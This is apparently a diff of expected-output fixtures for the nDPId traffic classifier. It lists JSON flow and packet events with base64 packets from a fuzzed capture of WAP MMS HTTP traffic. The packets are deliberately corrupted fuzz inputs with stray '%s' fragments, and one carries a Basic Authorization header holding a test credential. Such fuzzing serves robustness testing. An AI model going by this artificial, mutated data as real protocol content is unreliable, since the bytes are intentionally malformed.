-02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"} -00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} -00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxu
czpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOi
BjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"} 
+00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"AFCLk5N8CAAgsl17CABFAAXcxM9AAEAGEhKsFAMNrBRIBQBQCi7KxfhF5UF0EVAQg2xUTwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2Zds6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcJVpY2F0aU9uL3ZuZC53YXAubW1zLW1lQnNhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0MDAzDQpEYXRlOiBEaHUsIDEyI1NlcCAyMDAyIDE4OjEzOjU3IEdNVA0KDQqMhJgxODkzMDEAjZCLMTg5MzAwQGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQAhQQ9gOeoiRmAKzQ5MTcyNjEwMTAwNC9UWVBFPVBMTU4Alys0OTE3MjYxMDEwMDQvVFlQRT1QTE1OAJZSRTogAIqAj4GGgJCAhBuziWFwcGxpY2F0aW9uL3NtaWwAijxBQUHJPgACF5sIFmF1ZGlvL89tcgCFTWVtb18yLmFtcgAjIUFNUgoEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAIAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEYMHXD3zV\/8IgwWAMBAJCE3zKTS6yvWim2AQAaW9MjVBAFq9g49AEG3NPa5xSPjJCwdiuBGBzXCVzANBaejQlAgQt3KzJjOxe+tzME8YEwHMjOLJPC9RhIk1GBGcB9hyMVB+ymov9JgQcc+TIiquQD7ex2a4EwPA8+J0C0fnQHsHIBAJrIB2IKQBtWLyT3gRGCgMIhBG3oPgxOIIEYApux4qh3leJmGFmBAPwbXU1e9R22GaS9AQACnMDejLvmEUFMqwEnXCQ+IVVpDVVYOcgBAMm+YOVuf\/qr8C7EASdBxxFjGX+HDtZYUwEHBnMGjW5n+PI4knwBBsK4
